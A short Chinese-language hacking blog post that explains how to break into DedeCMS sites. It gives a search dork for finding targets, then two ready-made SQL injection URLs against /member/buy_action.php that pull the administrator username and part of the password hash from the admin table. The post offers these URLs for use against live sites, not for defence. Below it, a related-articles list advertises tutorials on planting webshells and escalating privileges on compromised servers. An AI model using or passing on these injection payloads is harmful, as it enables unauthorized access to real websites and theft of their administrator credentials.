dedecms注入爆管理员用户密码 ***

hacker5年前黑客文章992

关键词:powered by dedecms

首先注册个用户,注册地址:
/member/index_do.php?fmdo=user&dopost=regnew

爆管理帐号:
/member/buy_action.php?product=member&pid=1%20and%201=11%20union

%20select%201,2,userid,4,5%20from%20%23@__admin/*

爆管理员密码
/member/buy_action.php?product=member&pid=1%20and%201=11%20union%20

select%201,2,substring(pwd,9,16),4,5%20from%20%23@__admin/*

标签: 黑客技术

相关文章

ECshop商城系统后台拿webshell方法

ECshop商城系统后台拿webshell方法

之前,网上爆出了ecshop最新的0day .论坛里也有人直接给出了EXP 相信好多基友都拿了不少的站吧. 这几天正好有个朋友要我帮忙拿一个站 看了一下,ecshop的  直接...

侧门和木马病毒有什么不同?

侧门和木马病毒有什么不同?

侧门和木马病毒有什么不同? 我觉得严苛实际意义沒有差别的,微小的区别是有的。有一个微小区别先讲一下,这两个词出去早中晚不一样。老一代网络黑客,不屑黑本人设备(那时候本人机网速太慢),觉得网络服务器才...

入侵网站时的十种小经验

入侵网站时的十种小经验

入侵网站时的十种小经验 1.例如我们的目标网址为“http://www.xxxx.cn/forum/index.php”那么我们把地址改为http://www.xxxx.cn/for...

详解webshell提权服务器的21种方法

详解webshell提权服务器的21种方法

详解webshell提权服务器的21种方法 1.radmin连接法   条件是你权限够大,对方连防火墙也没有。封装个radmin上去,运行,开对方端口,然后radmin上去...

详解测试IP地址的几个命令

如果你是一位网络管理员或者是一位普通的拨号用户,可能经常会遇到这样一种情形,那就是访问某一个网站时可能会花费好长时间,或者根本就无法访问需要的网站,这样我们许多宝贵的时间就消耗在等待上了。那我们有没有...

Etherape是完全免费的吗?

Etherape是完全免费的吗?

什么叫Etherape? Etherape是以太网接口仿真模拟的图型网络监视器。它具备以图型方法显示信息互联网主题活动的IP,TCP和链路层方式。连接和服务器的尺寸随总流量而转变。它还具备颜色编码协...